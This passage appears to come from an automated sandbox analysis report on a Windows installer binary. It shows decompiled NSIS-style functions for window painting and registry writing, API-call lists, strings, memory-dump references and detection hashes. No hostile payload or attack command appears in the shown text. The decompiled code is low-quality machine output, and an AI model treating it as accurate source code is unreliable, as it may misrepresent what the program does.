				if(_a8 == 0x46) {
					 *(_t107 + 0x18) =  *(_t107 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t107 + 4)) =  *0x47eab4;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t107);
			}














                                                                                                                                                    0x0040100a
                                                                                                                                                    0x00401039
                                                                                                                                                    0x00401047
                                                                                                                                                    0x0040104d
                                                                                                                                                    0x00401051
                                                                                                                                                    0x0040105b
                                                                                                                                                    0x00401061
                                                                                                                                                    0x00401064
                                                                                                                                                    0x004010fc
                                                                                                                                                    0x00401081
                                                                                                                                                    0x00401089
                                                                                                                                                    0x0040108c
                                                                                                                                                    0x00401095
                                                                                                                                                    0x004010a9
                                                                                                                                                    0x004010c6
                                                                                                                                                    0x004010d5
                                                                                                                                                    0x004010d8
                                                                                                                                                    0x004010de
                                                                                                                                                    0x004010e3
                                                                                                                                                    0x004010ed
                                                                                                                                                    0x004010f6
                                                                                                                                                    0x004010f8
                                                                                                                                                    0x004010f8
                                                                                                                                                    0x00401109
                                                                                                                                                    0x0040110e
                                                                                                                                                    0x00401114
                                                                                                                                                    0x00401119
                                                                                                                                                    0x0040111b
                                                                                                                                                    0x00401121
                                                                                                                                                    0x00401128
                                                                                                                                                    0x0040112f
                                                                                                                                                    0x00401139
                                                                                                                                                    0x00401150
                                                                                                                                                    0x0040115f
                                                                                                                                                    0x00401169
                                                                                                                                                    0x0040116e
                                                                                                                                                    0x0040116e
                                                                                                                                                    0x00401119
                                                                                                                                                    0x00401177
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401181
                                                                                                                                                    0x00401010
                                                                                                                                                    0x00401013
                                                                                                                                                    0x00401015
                                                                                                                                                    0x0040101f
                                                                                                                                                    0x0040101f
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                    • FillRect.USER32 ref: 004010ED
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                    • String ID: F
                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64C790, Relevance: 25.6, APIs: 17, Instructions: 142windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E64B6D0: _DebugHeapAllocator.LIBCPMTD ref: 6E64B727
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E64C7F9
                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 6E64C812
                                                                                                                                                    • SendMessageW.USER32(00000000,00000303,00000000,00000000), ref: 6E64C825
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$AllocatorBase::Concurrency::details::ContextDebugHeapIdentityQueueWorkstd::ios_base::good
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2199816277-0
                                                                                                                                                    • Opcode ID: da5c46a870ede0e121abdc507b9cfd68dc088dafdc3769074652e9304d0f5d5f
                                                                                                                                                    • Instruction ID: 9e6dbb424db287e953a4d23b43f29cda5dfb43e75e2304467430c68289a542c4
                                                                                                                                                    • Opcode Fuzzy Hash: da5c46a870ede0e121abdc507b9cfd68dc088dafdc3769074652e9304d0f5d5f
                                                                                                                                                    • Instruction Fuzzy Hash: B8514F70A40609FFDB14DFE5C859BEEBBB8AB49711F108218F516AB3C0DB749A04CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E629D90, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(?), ref: 6E629B9A
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(00000000), ref: 6E629C35
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(00000000), ref: 6E629CD4
                                                                                                                                                    • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6E629DF2
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 6E629E08
                                                                                                                                                    • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6E629E24
                                                                                                                                                    • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6E629E61
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6E629F21
                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(00000000), ref: 6E629F2B
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629ED1
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629F37
                                                                                                                                                    • RunCaFunction, xrefs: 6E629DD1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocArraySafeString$Element$ClearCreateDestroyVariantVector
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$RunCaFunction
                                                                                                                                                    • API String ID: 104467155-2052640532
                                                                                                                                                    • Opcode ID: c9ab67be5b2c92de7af00c130b5dfe318f45ce2461a8d908dd89f3ab969bd5f8
                                                                                                                                                    • Instruction ID: 334c215e243050de2b3f47b571900e5229a62cc4c424c5c00421a7037ab7f143
                                                                                                                                                    • Opcode Fuzzy Hash: c9ab67be5b2c92de7af00c130b5dfe318f45ce2461a8d908dd89f3ab969bd5f8
                                                                                                                                                    • Instruction Fuzzy Hash: 7961E7B5D10609EFCB04CFE4C944BEEBBB8BF59314F108629E515AB280E7756A05CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F410, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 123windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxW.USER32(00000000,00000000,00000000,00000030), ref: 6E64F48F
                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,#32770,00000000), ref: 6E64F4EA
                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 6E64F51F
                                                                                                                                                    • GetDlgItem.USER32 ref: 6E64F52E
                                                                                                                                                    • SendMessageW.USER32(00000000,00001004,00000000,00000000), ref: 6E64F55B
                                                                                                                                                    • SendMessageW.USER32(00000000,0000104D,00000000,00000001), ref: 6E64F59B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ItemSend$FindTextWindow
                                                                                                                                                    • String ID: #32770$%s$->mb!$->mb!$install:$unpack:
                                                                                                                                                    • API String ID: 1611550948-655439780
                                                                                                                                                    • Opcode ID: df4a7f7243952ee59c293d541446a6e4c8ccfea58a50d537a70716f7e7b0cb8a
                                                                                                                                                    • Instruction ID: 83534f9f191cf708f618f0ef367488997480316945ef10ef9851705730b9cf2f
                                                                                                                                                    • Opcode Fuzzy Hash: df4a7f7243952ee59c293d541446a6e4c8ccfea58a50d537a70716f7e7b0cb8a
                                                                                                                                                    • Instruction Fuzzy Hash: DD412970940249EFDB54DFE0CD44FEE7B78BB05754F208629F926AA2C0EB74A644CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6799BC, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6E679A00
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B3B3
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B3C5
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B3D7
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B3E9
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B3FB
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B40D
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B41F
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B431
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B443
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B455
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B467
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B479
                                                                                                                                                      • Part of subcall function 6E67B396: _free.LIBCMT ref: 6E67B48B
                                                                                                                                                    • _free.LIBCMT ref: 6E6799F5
                                                                                                                                                      • Part of subcall function 6E67391E: HeapFree.KERNEL32(00000000,00000000,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?), ref: 6E673934
                                                                                                                                                      • Part of subcall function 6E67391E: GetLastError.KERNEL32(?,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?,?), ref: 6E673946
                                                                                                                                                    • _free.LIBCMT ref: 6E679A17
                                                                                                                                                    • _free.LIBCMT ref: 6E679A2C
                                                                                                                                                    • _free.LIBCMT ref: 6E679A37
                                                                                                                                                    • _free.LIBCMT ref: 6E679A59
                                                                                                                                                    • _free.LIBCMT ref: 6E679A6C
                                                                                                                                                    • _free.LIBCMT ref: 6E679A7A
                                                                                                                                                    • _free.LIBCMT ref: 6E679A85
                                                                                                                                                    • _free.LIBCMT ref: 6E679ABD
                                                                                                                                                    • _free.LIBCMT ref: 6E679AC4
                                                                                                                                                    • _free.LIBCMT ref: 6E679AE1
                                                                                                                                                    • _free.LIBCMT ref: 6E679AF9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                    • Opcode ID: d6963115a639975dd206b73fa95085ae4a83e117cadd1a6905cddf3a2d43a14d
                                                                                                                                                    • Instruction ID: 661642e539e3b8ce26db896110fdcf987b633493727b4c9eaf4f8d92243f1c9d
                                                                                                                                                    • Opcode Fuzzy Hash: d6963115a639975dd206b73fa95085ae4a83e117cadd1a6905cddf3a2d43a14d
                                                                                                                                                    • Instruction Fuzzy Hash: C1313A31A057059FEF719AF9D944B9A73EDEF42318F214829E095E7264EB31E980CB14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E631050, Relevance: 18.2, APIs: 12, Instructions: 212memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6310C6
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E6310D2
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E6310DA
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E63113C
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E63114C
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E631159
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6311B0
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6311C1
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6311D3
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E63125A
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork$std::ios_base::good
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 100152506-0
                                                                                                                                                    • Opcode ID: 82bda43bc786d27d7feacb99b37a69bb07562a7f3931ed8a0504cf4af4ec212a
                                                                                                                                                    • Instruction ID: 84492f5366a4d87156ce456a77841d1e0a2e34a77592132e5ff543442c5b64c7
                                                                                                                                                    • Opcode Fuzzy Hash: 82bda43bc786d27d7feacb99b37a69bb07562a7f3931ed8a0504cf4af4ec212a
                                                                                                                                                    • Instruction Fuzzy Hash: 81915B70C00258DFCB14DFE4D954BEEBBB8AF15308F60856CD416AB295DB742A09CF96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402880, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                                    			E00402880(int __ebx, void* __edx) {
				intOrPtr _t49;
				char _t65;
				int _t68;
				int _t72;
				void* _t74;
				void* _t77;
				int _t83;
				void* _t84;
				void* _t86;

				_t75 = __edx;
				_t72 = __ebx;
				if(__edx == __ebx) {
					_t77 =  *0x47eb64 + 0x80000001;
				}
				 *((intOrPtr*)(_t84 - 0x10)) =  *((intOrPtr*)(_t84 - 0x1c));
				 *(_t84 - 0x14) =  *(_t84 - 0x18);
				 *(_t84 - 0xc) = E0040145C(_t75, 2);
				 *(_t84 + 8) = E0040145C(_t75, 0x11);
				_t49 = E004061EC(_t77);
				_pop(_t74);
				 *((intOrPtr*)(_t84 - 0x34)) = _t49;
				 *(_t84 - 4) = 1;
				if(RegCreateKeyExW(_t77,  *(_t84 + 8), _t72, _t72, _t72,  *0x47eb90 | 0x00000002, _t72, _t84 - 0x44, _t72) != 0) {
					_push( *(_t84 + 8));
					_push( *((intOrPtr*)(_t84 - 0x34)));
					_push(L"WriteReg: error creating key \"%s\\%s\"");
					E004062CF();
				} else {
					 *(_t84 - 8) = _t72;
					if( *((intOrPtr*)(_t84 - 0x10)) != 1) {
						L10:
						_t83 = 4;
						if( *((intOrPtr*)(_t84 - 0x10)) == _t83) {
							_t74 = 3;
							_t65 = E00401446(_t74);
							_push(_t65);
							_push( *(_t84 - 0xc));
							 *0x4140f8 = _t65;
							_push( *(_t84 + 8));
							 *(_t84 - 8) = _t83;
							E004062CF(L"WriteRegDWORD: \"%s\\%s\" \"%s\"=\"0x%08x\"",  *((intOrPtr*)(_t84 - 0x34)));
							_t86 = _t86 + 0x14;
						}
						if( *((intOrPtr*)(_t84 - 0x10)) == 3) {
							 *(_t84 - 8) = E0040337F( *((intOrPtr*)(_t84 - 0x20)), _t72, 0x4140f8, 0xc018);
							E00406250(_t74, _t84 - 0x15c, 0x100, 0x4140f8, _t60);
							_push(_t84 - 0x15c);
							_push( *(_t84 - 0xc));
							_push( *(_t84 + 8));
							E004062CF(L"WriteRegBin: \"%s\\%s\" \"%s\"=\"%s\"",  *((intOrPtr*)(_t84 - 0x34)));
							_t86 = _t86 + 0x24;
						}
					} else {
						E0040145C(_t75, 0x23);
						_t68 = lstrlenW(0x4140f8);
						_push(0x4140f8);
						_push( *(_t84 - 0xc));
						_push( *(_t84 + 8));
						 *(_t84 - 8) = _t68 + _t68 + 2;
						_push( *((intOrPtr*)(_t84 - 0x34)));
						if( *(_t84 - 0x14) != 1) {
							_push(L"WriteRegExpandStr: \"%s\\%s\" \"%s\"=\"%s\"");
							E004062CF();
							_t86 = _t86 + 0x14;
							goto L10;
						} else {
							_push(L"WriteRegStr: \"%s\\%s\" \"%s\"=\"%s\"");
							E004062CF();
							_t86 = _t86 + 0x14;
						}
					}
					if(RegSetValueExW( *(_t84 - 0x44),  *(_t84 - 0xc), _t72,  *(_t84 - 0x14), 0x4140f8,  *(_t84 - 8)) != 0) {
						_push( *(_t84 - 0xc));
						_push( *(_t84 + 8));
						E004062CF(L"WriteReg: error writing into \"%s\\%s\" \"%s\"",  *((intOrPtr*)(_t84 - 0x34)));
					} else {
						 *(_t84 - 4) = _t72;
					}
					_push( *(_t84 - 0x44));
					RegCloseKey();
				}
				 *0x47eb68 =  *0x47eb68 +  *(_t84 - 4);
				return 0;
			}












                                                                                                                                                    0x00402880
                                                                                                                                                    0x00402880
                                                                                                                                                    0x00402882
                                                                                                                                                    0x0040288e
                                                                                                                                                    0x0040288e
                                                                                                                                                    0x00402897
                                                                                                                                                    0x0040289f
                                                                                                                                                    0x004028a9
                                                                                                                                                    0x004028b2
                                                                                                                                                    0x004028b5
                                                                                                                                                    0x004028ba
                                                                                                                                                    0x004028bc
                                                                                                                                                    0x004028d7
                                                                                                                                                    0x004028e2
                                                                                                                                                    0x004029ef
                                                                                                                                                    0x004029f2
                                                                                                                                                    0x004029f5
                                                                                                                                                    0x00401b86
                                                                                                                                                    0x004028e8
                                                                                                                                                    0x004028e8
                                                                                                                                                    0x004028f3
                                                                                                                                                    0x00402937
                                                                                                                                                    0x00402939
                                                                                                                                                    0x0040293d
                                                                                                                                                    0x00402941
                                                                                                                                                    0x00402942
                                                                                                                                                    0x00402947
                                                                                                                                                    0x00402948
                                                                                                                                                    0x0040294b
                                                                                                                                                    0x00402950
                                                                                                                                                    0x00402953
                                                                                                                                                    0x0040295e
                                                                                                                                                    0x00402963
                                                                                                                                                    0x00402963
                                                                                                                                                    0x0040296a
                                                                                                                                                    0x0040297d
                                                                                                                                                    0x0040298c
                                                                                                                                                    0x00402997
                                                                                                                                                    0x00402998
                                                                                                                                                    0x0040299b
                                                                                                                                                    0x004029a6
                                                                                                                                                    0x004029ab
                                                                                                                                                    0x004029ab
                                                                                                                                                    0x004028f5
                                                                                                                                                    0x004028f7
                                                                                                                                                    0x004028fd
                                                                                                                                                    0x00402902
                                                                                                                                                    0x00402903
                                                                                                                                                    0x0040290a
                                                                                                                                                    0x0040290d
                                                                                                                                                    0x00402910
                                                                                                                                                    0x00402916
                                                                                                                                                    0x0040292a
                                                                                                                                                    0x0040292f
                                                                                                                                                    0x00402934
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402918
                                                                                                                                                    0x00402918
                                                                                                                                                    0x0040291d
                                                                                                                                                    0x00402922
                                                                                                                                                    0x00402922
                                                                                                                                                    0x00402916
                                                                                                                                                    0x004029c4
                                                                                                                                                    0x004029cb
                                                                                                                                                    0x004029ce
                                                                                                                                                    0x004029d9
                                                                                                                                                    0x004029c6
                                                                                                                                                    0x004029c6
                                                                                                                                                    0x004029c6
                                                                                                                                                    0x004029e1
                                                                                                                                                    0x004029e4
                                                                                                                                                    0x004029e4
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                    • Opcode ID: 88e4ee1587b6acc04eade602774f77907f811befdb6ad9f01a68df4d4fc2eb7d
                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                    • Opcode Fuzzy Hash: 88e4ee1587b6acc04eade602774f77907f811befdb6ad9f01a68df4d4fc2eb7d
                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65E788, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 6E65E7A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Initialize
                                                                                                                                                    • String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
                                                                                                                                                    • API String ID: 2538663250-1403614551
                                                                                                                                                    • Opcode ID: e249d3c543c994d48b6ae1aa6229bf12f74523944a1e3633a3587adc1dd267b8
                                                                                                                                                    • Instruction ID: 0272747c1e81232f54087624d7ab70ddb29318099cb4527f56788b4262abb65a
                                                                                                                                                    • Opcode Fuzzy Hash: e249d3c543c994d48b6ae1aa6229bf12f74523944a1e3633a3587adc1dd267b8
                                                                                                                                                    • Instruction Fuzzy Hash: 71219C75250B42AFDB605FF6CC88B577BA9EB42265F00492EE58285750EF30D410CA30
                                                                                                                                                    Uniqueness

